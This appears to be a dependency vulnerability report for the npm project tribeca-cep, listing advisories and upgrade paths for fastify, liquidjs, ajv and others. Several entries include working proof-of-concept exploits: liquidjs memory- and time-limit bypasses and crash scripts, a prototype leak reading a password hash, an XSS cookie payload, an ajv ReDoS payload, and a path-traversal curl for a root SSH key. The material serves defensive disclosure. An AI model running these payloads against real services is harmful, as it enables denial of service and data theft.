Vulnerabilities |
19 via 19 paths |
|---|---|
Dependencies |
118 |
Source |
GitHub |
Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: fastify
- Introduced through: fastify@3.29.5
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › fastify@3.29.5Remediation: Upgrade to fastify@5.7.2.
Overview
fastify is an overhead web framework, for Node.js.
Affected versions of this package are vulnerable to Interpretation Conflict via the Content-Type header processing. An attacker can bypass body validation by appending a tab character (\t) and arbitrary content to the Content-Type header, causing the server to treat the body as the intended type without enforcing validation rules.
Note: This vulnerability affects all Fastify users who rely on Content-Type-based body validation schemas to enforce data integrity or security constraints.
Workaround
This vulnerability can be mitigated by implementing a custom onRequest hook to reject requests containing tab characters in the Content-Type header.
Remediation
Upgrade fastify to version 5.7.2 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.1.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through improper validation of range values in the use function. An attacker can cause the process to crash and render the service unavailable by submitting specially crafted reverse range expressions and triggering memory allocation operations that bypass configured limits.
Note:
This is only exploitable if user-supplied templates are rendered with the memory limit option enabled.
PoC
const { Liquid } = require('liquidjs');
(async () => {
const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit
// Step 1 — Baseline: memoryLimit blocks large allocation
console.log('=== Step 1: Baseline (should fail) ===');
try {
const baseline = "{% assign s = 'A' %}{% for i in (1..27) %}{% assign s = s | append: s %}{% endfor %}{{ s | size }}";
const result = await engine.parseAndRender(baseline);
console.log('Result:', result); // Should not reach here
} catch (e) {
console.log('Blocked:', e.message); // "memory alloc limit exceeded"
}
// Step 2 — Bypass: reverse ranges drive counter negative
console.log('\n=== Step 2: Bypass (should succeed) ===');
try {
const bypass = "{% for x in (100000000..1) %}{% endfor %}{% for x in (100000000..1) %}{% endfor %}{% assign s = 'A' %}{% for i in (1..27) %}{% assign s = s | append: s %}{% endfor %}{{ s | size }}";
const result = await engine.parseAndRender(bypass);
console.log('Result:', result); // "134217728" — 134MB allocated despite 100MB limit
} catch (e) {
console.log('Error:', e.message);
}
// Step 3 — Process crash: cons-string flattening via replace
console.log('\n=== Step 3: Process crash (node process will terminate) ===');
console.log('If the process exits here with code 133/SIGTRAP, the crash is confirmed.');
try {
const crash = [
...Array(5).fill('{% for x in (100000000..1) %}{% endfor %}'),
"{% assign s = 'A' %}{% for i in (1..27) %}{% assign s = s | append: s %}{% endfor %}",
"{% assign flat = s | replace: 'A', 'B' %}{{ flat | size }}"
].join('');
const result = await engine.parseAndRender(crash);
console.log('Result:', result); // Should not reach here
} catch (e) {
console.log('Caught error:', e.message); // V8 Fatal error is NOT catchable
}
})();
Remediation
Upgrade liquidjs to version 10.25.1 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.1.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the replace_first function. An attacker can exhaust system memory and disrupt service availability by crafting templates that exploit uncharged memory amplification using special replacement patterns, resulting in excessive memory allocation and blocking legitimate user requests.
PoC
const { Liquid } = require('liquidjs');
(async () => {
const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit
// Step 1 — Verify $& expansion in replace_first
console.log('=== Step 1: $& expansion in replace_first ===');
const step1 = '{{ "HELLO" | replace_first: "HELLO", "$&-$&-$&" }}';
console.log('Result:', await engine.parseAndRender(step1));
// Output: "HELLO-HELLO-HELLO" — $& expanded to matched string
// Step 2 — Verify replace (split/join) is safe
console.log('\n=== Step 2: replace is safe ===');
const step2 = '{{ "ABCDE" | replace: "ABCDE", "$&$&$&" }}';
console.log('Result:', await engine.parseAndRender(step2));
// Output: "$&$&$&" — $& treated as literal
// Step 3 — 5-stage exponential amplification (50x per stage)
console.log('\n=== Step 3: Exponential amplification (625,000:1) ===');
const amp50 = '$&'.repeat(50);
const step3 = [
'{% assign s = "A" %}',
'{% assign s = s | replace_first: s, "' + amp50 + '" %}',
'{% assign s = s | replace_first: s, "' + amp50 + '" %}',
'{% assign s = s | replace_first: s, "' + amp50 + '" %}',
'{% assign s = s | replace_first: s, "' + amp50 + '" %}',
'{% assign s = s | replace_first: s, "' + amp50 + '" %}',
'{{ s | size }}'
].join('');
const startMem = process.memoryUsage().heapUsed;
const result = await engine.parseAndRender(step3);
const endMem = process.memoryUsage().heapUsed;
console.log('Output string size:', result.trim(), 'bytes'); // "312500000"
console.log('Heap increase:', ((endMem - startMem) / 1e6).toFixed(1), 'MB');
console.log('Amplification: ~625,000:1 (1 byte input -> 312.5 MB output)');
console.log('memoryLimit charged: < 7 MB (only input lengths counted)');
})();
Remediation
Upgrade liquidjs to version 10.25.1 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.4.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Improperly Implemented Security Check for Standard via the sort_natural and sort filters, which bypass the iownPropertyOnly security option by accessing prototype-inherited properties even when a security option is enabled. An attacker can extract sensitive information from prototype properties by manipulating the sorting process to reveal the values through side-channel analysis.
Remediation
Upgrade liquidjs to version 10.25.4 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.6.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Uncontrolled Recursion through a circular reference in the block.ts during OUTPUT mode. An attacker can cause the application to enter an infinite recursive loop, leading to memory exhaustion and process termination by submitting a nested block with the same child block name.
Remediation
Upgrade liquidjs to version 10.25.6 or higher.
References
high severity
- Vulnerable module: ajv
- Introduced through: ajv@7.2.4
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › ajv@7.2.4Remediation: Upgrade to ajv@8.18.0.
Overview
ajv is an Another JSON Schema Validator
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper validation of the pattern keyword when combined with $data references. An attacker can cause the application to become unresponsive and exhaust CPU resources by submitting a specially crafted regular expression payload.
Note:
This is only exploitable if the $data option is enabled.
PoC
const Ajv = require('ajv');
// Vulnerable configuration — $data enables runtime pattern injection
const ajv = new Ajv({ $data: true });
const schema = {
type: 'object',
properties: {
pattern: { type: 'string' },
value: {
type: 'string',
pattern: { $data: '1/pattern' } // Pattern comes from the data itself
}
}
};
const validate = ajv.compile(schema);
// Malicious payload — both the pattern and the triggering input
const maliciousPayload = {
pattern: '^(a|a)*$', // Catastrophic backtracking pattern
value: 'a'.repeat(30) + 'X' // 30 'a's followed by 'X' to force full backtracking
};
console.time('attack');
validate(maliciousPayload); // Blocks the entire Node.js process for ~44 seconds
console.timeEnd('attack');
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade ajv to version 6.14.0, 8.18.0 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.0.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Directory Traversal via the Loader.candidates resolution when require.resolve() is used as a fallback; an attacker can read arbitrary filesystem files by providing a dynamic include with a path like ../../../etc/passwd despite root restrictions.
Notes: Exploitation requires the attacker to control the template content or specify the filepath to be included as a Liquid variable
Workaround
This vulnerability can be mitigated by modifying the build output to enforce directory restrictions or by overriding the default fs implementation to restrict file access (see #851 for additional details).
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade liquidjs to version 10.25.0 or higher.
References
high severity
new
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.26.0.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Denial of Service (DoS) through the renderTemplates function when the for or tablerow tag is used with an empty body. An attacker can exhaust server resources and cause significant delays in processing by submitting specially crafted templates that bypass configured time limits, resulting in prolonged event-loop blocking.
PoC
# Empty for-body bypasses renderLimit (50 ms) and runs for ~2.26 s:
$ node -e "const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e9, renderLimit: 50 });
const t = Date.now();
engine.parseAndRenderSync('{%- for i in (1..30000000) -%}{%- endfor -%}', {});
console.log('Took', Date.now()-t, 'ms');"
Took 2255 ms
# Same template with a single-character body is correctly bounded:
$ node -e "const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e9, renderLimit: 50 });
try { engine.parseAndRenderSync('{%- for i in (1..30000000) -%}.{%- endfor -%}', {}); }
catch(e) { console.log('correctly threw:', e.message); }"
correctly threw: template render limit exceeded, line:1, col:1
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade liquidjs to version 10.26.0 or higher.
References
high severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.3.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to UNIX Symbolic Link (Symlink) Following through the include, render, and layout directories, when symlinks are placed within a trusted template root. An attacker can access and render files outside the intended directory by creating symlinks that point to external files.
Remediation
Upgrade liquidjs to version 10.25.3 or higher.
References
medium severity
- Vulnerable module: find-my-way
- Introduced through: fastify@3.29.5
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › fastify@3.29.5 › find-my-way@4.5.1Remediation: Upgrade to fastify@4.26.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including two parameters ending with - in a single segment, which causes inefficient backtracking when parsing the string into a regular expression. The resulting poor performance can lead to denial of service.
Note:
This vulnerability is similar to the path-to-regexp ReDoS Vulnerability
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade find-my-way to version 8.2.2, 9.0.1 or higher.
References
medium severity
new
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.26.0.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Insecure Default Initialization of Resource in the Context.spawn function. An attacker can access prototype-chain properties of objects passed into a {% render %} partial by supplying crafted templates that exploit the lack of propagation of the ownPropertyOnly setting. This allows reading sensitive information, such as secrets or internal state, from within partial templates even when per-render lockdowns are intended.
PoC
mkdir -p /tmp/render-poc
printf '{{ user.passwordHash }}' > /tmp/render-poc/_user.liquid
node -e "
const { Liquid } = require('./dist/liquid.node.js');
const liquid = new Liquid({ ownPropertyOnly: false, root: '/tmp/render-poc' });
class User { constructor(n){ this.name = n; } }
User.prototype.passwordHash = 'bcrypt\$secret';
const u = new User('alice');
liquid.parseAndRender(
'Direct:[{{ user.passwordHash }}] Render:[{% render \"_user.liquid\", user: user %}]',
{ user: u },
{ ownPropertyOnly: true }
).then(console.log);
"
Remediation
Upgrade liquidjs to version 10.26.0 or higher.
References
medium severity
- Vulnerable module: cookie
- Introduced through: fastify@3.29.5
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › fastify@3.29.5 › light-my-request@4.12.0 › cookie@0.5.0Remediation: Upgrade to fastify@4.0.0.
Overview
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie name, path, or domain, which can be used to set unexpected values to other cookie fields.
Workaround
Users who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade cookie to version 0.7.0 or higher.
References
medium severity
- Vulnerable module: fastify
- Introduced through: fastify@3.29.5
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › fastify@3.29.5Remediation: Upgrade to fastify@5.7.3.
Overview
fastify is an overhead web framework, for Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the sendWebStream function. An attacker can cause excessive memory consumption by sending a slow or non-reading client request, leading to unbounded buffering and severe performance degradation or process crashes.
Note: Only applications that return a ReadableStream (or Response with a Web Stream body) via reply.send() are impacted
Workaround
This vulnerability can be mitigated by avoiding Fastify Web Streams in responses and instead using Node.js streams or buffered payloads.
Remediation
Upgrade fastify to version 5.7.3 or higher.
References
medium severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.5.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Directory Traversal via the renderFile() or parseFile() functions that fail to enforce root boundry. An attacker can access arbitrary files on the server by supplying crafted file paths that bypass the intended root directory restrictions.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade liquidjs to version 10.25.5 or higher.
References
medium severity
- Vulnerable module: fastify
- Introduced through: fastify@3.29.5
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › fastify@3.29.5Remediation: Upgrade to fastify@5.8.3.
Overview
fastify is an overhead web framework, for Node.js.
Affected versions of this package are vulnerable to Use of Less Trusted Source in the request.protocol and request.host getters. An attacker can manipulate the perceived protocol and host by sending crafted X-Forwarded-Proto and X-Forwarded-Host headers after bypassing the proxy and connecting directly to the application port, potentially impacting security decisions such as HTTPS enforcement, secure cookie flags, CSRF origin checks, URL construction, or host-based routing.
Note: This is only exploitable if the application uses the trustProxy option with a restrictive trust function and relies on request.protocol or request.host for security decisions, and the attacker is able to connect directly to the application, bypassing the proxy.
Remediation
Upgrade fastify to version 5.8.3 or higher.
References
medium severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.25.3.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the replace filter when the memoryLimit option is enabled. An attacker can exhaust system memory and cause denial of service by crafting templates that exploit quadratic amplification in the output size, bypassing configured memory limits.
Note: This is only exploitable if memory limiting is explicitly enabled and the attacker has the ability to author or control template content.
Remediation
Upgrade liquidjs to version 10.25.3 or higher.
References
medium severity
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.0.0.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Information Exposure when ownPropertyOnly parameter is set to False, which results in leaking properties of a prototype.
Workaround
For versions 9.34.0 and higher, an option to disable this functionality is provided.
Remediation
Upgrade liquidjs to version 10.0.0 or higher.
References
medium severity
new
- Vulnerable module: liquidjs
- Introduced through: liquidjs@9.43.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › liquidjs@9.43.0Remediation: Upgrade to liquidjs@10.26.0.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the strip_html filter, which fails to properly remove HTML tags containing newline characters. An attacker can inject malicious HTML or JavaScript into rendered output by crafting tags with embedded newlines, leading to execution of arbitrary scripts in the victim's browser.
PoC
node -e "
const { Liquid } = require('./dist/liquid.node.js');
const engine = new Liquid();
engine.parseAndRender(
'Safe output: {{ input | strip_html }}',
{ input: '<img\nsrc=x\nonerror=\"alert(document.cookie)\">' }
).then(r => console.log(JSON.stringify(r)));
"
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade liquidjs to version 10.26.0 or higher.
References
low severity
- Vulnerable module: debug
- Introduced through: agenda@3.1.0
Detailed paths
-
Introduced through: tribeca-cep@3beca/cep › agenda@3.1.0 › debug@4.1.1Remediation: Upgrade to agenda@4.0.0.
Overview
debug is a small debugging utility.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the function useColors via manipulation of the str argument.
The vulnerability can cause a very low impact of about 2 seconds of matching time for data 50k characters long.
Note: CVE-2017-20165 is a duplicate of this vulnerability.
PoC
Use the following regex in the %o formatter.
/\s*\n\s*/
Details
